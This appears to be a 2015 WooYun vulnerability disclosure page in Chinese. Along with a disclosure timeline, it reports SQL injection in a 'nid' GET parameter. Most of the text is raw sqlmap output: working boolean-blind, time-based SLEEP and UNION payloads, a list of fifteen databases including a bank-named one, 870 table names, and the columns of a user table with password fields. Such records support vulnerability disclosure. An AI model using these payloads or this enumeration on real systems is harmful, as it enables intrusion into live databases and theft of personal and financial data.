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漏洞作者: 路人甲

提交时间:2015-09-26 08:04

修复时间:2015-11-14 09:20

公开时间:2015-11-14 09:20





漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]


4人收藏 收藏



2015-09-26: 细节已通知厂商并且等待厂商处理中
2015-09-30: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-10-10: 细节向核心白帽子及相关领域专家公开
2015-10-20: 细节向普通白帽子公开
2015-10-30: 细节向实习白帽子公开
2015-11-14: 细节向公众公开









sqlmap identified the following injection points with a total of 76 HTTP(s) requests:
Parameter: nid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: nid=53 AND 8048=8048
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: nid=53 AND (SELECT * FROM (SELECT(SLEEP(100)))sdWT)
Type: UNION query
Title: Generic UNION query (NULL) - 14 columns
Payload: nid=-1015 UNION ALL SELECT NULL,NULL,CONCAT(0x716b6a7071,0x675a4b72655959517163,0x716b787671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.2.17
back-end DBMS: MySQL 5.0.12


web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.0
available databases [15]:
[*] apermin0320
[*] biweb
[*] cms1
[*] dedecmsv57gbksp1
[*] freecken
[*] hiked
[*] information_schema
[*] lanhuah
[*] mysql
[*] sjyrw
[*] test
[*] w7ims
[*] wechat
[*] zrcbank
[*] zrcmall


web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.0
Database: apermin0320


web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.2.17
back-end DBMS: MySQL 5
Database: apermin0320
[870 tables]
| update |
| user |
| accessbank |
| accessprepay |
| accesspreshou |
| accesstype |
| affair |
| bank |
| bankzhuru |
| buyplanmain |
| buyplanmain_detail |
| buyplanmain_detail_color |
| buyplanmain_mingxi |
| buyplanmain_tmp_color |
| buyplanstate |
| calendar |
| calendar_type |
| callchuli |
| callertype |
| calltype |
| certificate |
| certificatetype |
| commlog |
| competeproduct |
| contact |
| contract_flag |
| crm_chance |
| crm_chance_rate |
| crm_contact |
| crm_customer_move |
| crm_dict_servicesources |
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| crm_remember |
| crm_service |
| crm_shenhezhuangtai |
| crm_shenqingbaobei |
| crm_zhuangtai |
| customer |
| customer_fangan |
| customer_xuqiu |
| customerarea |
| customerbelong |
| customerdefinetype |
| customerlever |
| customerorigin |
| customerproduct |
| customerproduct_detail |
| customs_ranking_list |
| department |
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| dict_danyuanzhuangtai |
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| dict_shiyongleixing |
| dict_weekday |
| dict_xingbie |
| dict_xingzheng_qingjia |
| dict_zhengjianleixing |
| dorm_area |
| dorm_building |
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| ecs_pay_log |
| ecs_payment |
| ecs_plugins |
| ecs_products |
| ecs_reg_extend_info |
| ecs_reg_fields |
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| ecs_seller_category |
| ecs_seller_extend_info |
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| ecs_seller_shopheader |
| ecs_seller_shopinfo |
| ecs_seller_shopslide |
| ecs_seller_shopwindow |
| ecs_sessions |
| ecs_sessions_data |
| ecs_shipping |
| ecs_shipping_area |
| ecs_shop_config |
| ecs_snatch_log |
| ecs_stats |
| ecs_store_category |
| ecs_street_tags |
| ecs_suppliers |
| ecs_tag |
| ecs_template |
| ecs_topic |
| ecs_touch_activity |
| ecs_touch_ad |
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| ecs_touch_article |
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| ecs_users |
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| ecs_wechat |
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| ecs_wechat_extend |
| ecs_wechat_mass_history |
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| ecs_weixin_menu |
| ecs_weixin_point |
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| ecs_weixin_user |
| ecs_wholesale |
| email |
| emailstate |
| exchange |
| fahuodan |
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| fahuostate |
| fahuotype |
| feiyongclass |
| feiyongrecord |
| feiyongtype |
| fixedasset |
| fixedassetbaofei |
| fixedassetgroup |
| fixedassetin |
| fixedassetleibie |
| fixedassetout |
| fixedassetstatus |
| fixedassettiaoku |
| fixedassettui |
| fixedassetweixiu |
| fukuanplan |
| fukuanrecord |
| gb_marriage |
| gb_national |
| gb_political |
| gb_sex |
| hk_cityclass |
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| hk_delivery |
| hk_delivery_notice |
| hk_goods |
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| hk_hoteluser |
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| hk_user |
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| hrms_laboringskill |
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| hrms_zhiwei_status |
| hrms_zpjihua |
| hrms_zprencaiku |
| huikuanplan |
| huikuanrecord |
| ifneed |
| important |
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| ims_weishare_user |
| ims_weivote_log |
| ims_weivote_option |
| ims_weivote_setting |
| ims_wish |
| ims_xcommunity_activity |
| ims_xcommunity_admap |
| ims_xcommunity_advertisement |
| ims_xcommunity_announcement |
| ims_xcommunity_carpool |
| ims_xcommunity_fled |
| ims_xcommunity_manager |
| ims_xcommunity_member |
| ims_xcommunity_navextension |
| ims_xcommunity_phone |
| ims_xcommunity_property |
| ims_xcommunity_region |
| ims_xcommunity_reply |
| ims_xcommunity_report |
| ims_xcommunity_res |
| ims_xcommunity_search |
| ims_xcommunity_service |
| ims_xcommunity_servicecategory |
| ims_xcommunity_set |
| ims_xcommunity_slide |
| ims_xcommunity_verifycode |
| ims_xhw_picvote |
| ims_xhw_picvote_log |
| ims_xhw_picvote_reg |
| ims_xhw_picvote_setting |
| ims_yoby_kehu |
| ims_yoby_xiangmu |
| ims_yqs_award |
| ims_yqs_reply |
| ims_yqs_winner |
| ims_yyy_reply |
| ims_yyy_winner |
| ims_yyyonline_reply |
| ims_yyyonline_winner |
| info |
| inorout |
| kaipiaorecord |
| kaipiaostate |
| linkman |
| measure |
| menu |
| message |
| modifyrecord |
| notify |
| numzero |
| office_task |
| officeguihuanstate |
| officeproduct |
| officeproductbaofei |
| officeproductcangku |
| officeproductgroup |
| officeproductin |
| officeproductleibie |
| officeproductout |
| officeproducttiaoku |
| officeproducttui |
| paystate |
| phpshe_ad |
| phpshe_admin |
| phpshe_article |
| phpshe_ask |
| phpshe_cart |
| phpshe_category |
| phpshe_class |
| phpshe_collect |
| phpshe_comment |
| phpshe_link |
| phpshe_order |
| phpshe_orderdata |
| phpshe_page |
| phpshe_payway |
| phpshe_product |
| phpshe_setting |
| phpshe_user |
| product |
| productcolor |
| producttype |
| productzuzhuang |
| productzuzhuang2_detail |
| productzuzhuang_detail |
| productzuzhuangstate |
| property |
| salemode |
| salseman_ranking_list |
| sellbilltype |
| sellcontract_jiaofu |
| sellplanmain |
| sellplanmain_detail |
| sellplanmain_detail_color |
| sellplanstate |
| shoupiaorecord |
| sms_sendlist |
| ssu_loginadmin |
| ssu_shopplay |
| ssu_shopuser |
| ssu_shopuser_copy |
| ssu_shopuser_copy1 |
| ssu_shopuser_youchu |
| ssu_shopvip |
| ssu_shopvip_youchu |
| stock |
| stockchangemain |
| stockchangemain_detail |
| stockchangestate |
| stockinmain |
| stockinmain_detail |
| stockinmain_detail_color |
| stockinmain_view |
| stockoutmain |
| stockoutmain_detail |
| stockoutmain_detail_color |
| stockoutmain_view |
| store |
| store_color |
| store_init |
| store_product |
| storeaccesstype |
| storecheck |
| storecheck_detail |
| supply |
| supplylever |
| supplylinkman |
| supplyproduct |
| sys_code |
| sys_function |
| sys_menu |
| system_log |
| system_logall |
| system_logtype |
| systemconfig |
| systemhelp |
| systemlang |
| systemprivate |
| systemprivateconfig |
| systemprivateinc |
| systemtable |
| test |
| tys_admin |
| tys_baozhuang |
| tys_car |
| tys_company |
| tys_danjiatype |
| tys_daozhan |
| tys_guige |
| tys_hetong |
| tys_hetong_detail |
| tys_pinming |
| tys_shangbiao |
| tys_shouhuo |
| tys_tielu |
| tys_xufang |
| tys_zhantai |
| tys_zhiliang |
| unit |
| unitprop |
| user_priv |
| v_accessbank |
| v_accessprepay |
| v_accesspreshou |
| v_bankzhurutype |
| v_buyplanmain_detail |
| v_feiyong_sq |
| v_feiyongbaoxiao |
| v_feiyongclass |
| v_feiyongrecord |
| v_feiyongtype |
| v_sellcontract |
| v_sellcontract_plan |
| v_sellone |
| v_sellonedetail |
| v_sellplanmain_detail |
| v_shouruclass |
| v_shoururecord |
| v_shourutype |
| v_supplyownmoney |
| v_workplanmain_detail |
| v_yingkaipiaohuizong |
| v_yingshoukuanhuizong |
| vip |
| w |
| workplanmain |
| workplanmain_detail |
| workplanshenhe |
| workplanstate |
| workreport |
| wygl_baoxiuxinxi |
| wygl_biaoxiuxiangmu |
| wygl_gongchenghetong |
| wygl_gongchengjindu |
| wygl_gongchengxinxi |
| wygl_pingjialeixing |
| wygl_weixiupingjia |
| yunfeitype |
| zhk_admin |
| zhk_city |
| zhk_content |
| zhk_content_zrc |
| zhk_ddz_cc |
| zhk_ddz_cc_copy |
| zhk_ddz_user |
| zhk_ddz_user2 |
| zhk_picture |


web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.2.17
back-end DBMS: MySQL 5
Database: apermin0320
Table: user
[83 columns]
| Column | Type |
| ADD_HOME | varchar(200) |
| AUTHORIZE | int(11) |
| AVATAR | varchar(20) |
| BBS_COUNTER | int(11) |
| BBS_SIGNATURE | text |
| BIND_IP | text |
| BIRTHDAY | date |
| BKGROUND | text |
| BP_NO | varchar(50) |
| BYNAME | varchar(20) |
| CALL_SOUND | char(2) |
| CANBROADCAST | int(11) |
| CONCERN_USER | text |
| DEPT_ID | int(11) |
| DEPT_ID_OTHER | text |
| DISABLED | int(11) |
| DUTY_TYPE | int(11) |
| EMAIL | varchar(50) |
| EMAIL_CAPACITY | int(11) |
| EmailAddress | varchar(100) |
| EmailPassword | varchar(100) |
| FAX_NO_DEPT | varchar(50) |
| FOLDER_CAPACITY | int(11) |
| FUNC_ID_STR | varchar(1000) |
| ICQ_NO | varchar(50) |
| IS_LUNAR | char(1) |
| KEY_SN | varchar(100) |
| LAST_PASS_TIME | datetime |
| LAST_VISIT_IP | varchar(100) |
| LAST_VISIT_TIME | datetime |
| leftmenu | varchar(50) |
| LIMIT_LOGIN | char(1) |
| MENU_EXPAND | char(2) |
| MENU_IMAGE | varchar(20) |
| MENU_TYPE | char(1) |
| MOBIL_NO | varchar(50) |
| MOBIL_NO_HIDDEN | char(1) |
| MOBILE_PS1 | varchar(50) |
| MOBILE_PS2 | varchar(50) |
| MOBILE_SP | varchar(50) |
| MSN | varchar(200) |
| MY_RSS | text |
| MY_STATUS | varchar(200) |
| MYTABLE_LEFT | varchar(200) |
| MYTABLE_RIGHT | varchar(200) |
| NICK_NAME | varchar(50) |
| NOT_LOGIN | varchar(20) |
| NOT_VIEW_TABLE | varchar(20) |
| NOT_VIEW_USER | varchar(20) |
| OICQ_NO | varchar(50) |
| ON_STATUS | char(1) |
| ONLINE | int(11) |
| PANEL | char(1) |
| PASSWORD | varchar(50) |
| PIC_ID | int(10) unsigned |
| POST_DEPT | text |
| POST_NO_HOME | varchar(50) |
| POST_PRIV | varchar(50) |
| REMARK | text |
| rightmenu | varchar(50) |
| SCORE | int(11) |
| SECURE_KEY_SN | varchar(20) |
| SEX | char(1) |
| SHORTCUT | text |
| SHOW_RSS | char(1) |
| SMS_ON | char(1) |
| SMTPServerIP | varchar(100) |
| TDER_FLAG | char(1) |
| TEL_NO_DEPT | varchar(50) |
| TEL_NO_HOME | varchar(50) |
| THEME | varchar(10) |
| UID | int(11) |
| UIN | int(10) unsigned |
| USEING_KEY | char(2) |
| USER_DEFINE | text |
| USER_ID | varchar(20) |
| USER_NAME | varchar(200) |
| USER_NO | int(11) |
| USER_PRIV | varchar(10) |
| USER_PRIV_OTHER | text |
| WEATHER_CITY | varchar(20) |
| WEBMAIL_CAPACITY | int(11) |
| WEBMAIL_NUM | int(11) |




版权声明:转载请注明来源 路人甲@乌云





确认时间:2015-09-30 09:19



